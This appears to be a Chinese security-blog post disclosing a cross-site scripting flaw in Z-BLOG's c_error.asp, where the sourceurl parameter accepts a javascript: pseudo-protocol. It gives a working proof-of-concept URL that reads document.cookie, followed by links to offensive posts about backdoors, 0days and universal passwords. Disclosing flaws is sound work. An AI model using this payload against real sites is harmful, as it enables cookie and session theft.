漏洞描述:Z-BLOG后台登陆错误信息显示文件c_error.asp,虽然对跳转URL的参数sourceurl进行了编码,但没有判断链接头部,执行了javascript伪协议,造成跨站脚本漏洞。漏洞测试:
http://www.xxx.com/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)
PHP万能密码
php+mysql如何爆页面绝对路径
UDEV本地溢出漏洞利用手记
微软爆严重漏洞 网民在线看电影可能中毒
ASPX一句话脚本马详细分析
最隐蔽的asp后门
亿科影视系统0day
自己构造注入点
dedecms 5.3的一处鸡肋漏洞
135 1433 3389 扫描 网通 电信 铁通 活跃ip段
发表评论:
名称(*)
邮箱
网站链接
正文(*)(留言最长字数:1000)
记住我,下次回复时不用重新输入个人信息
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。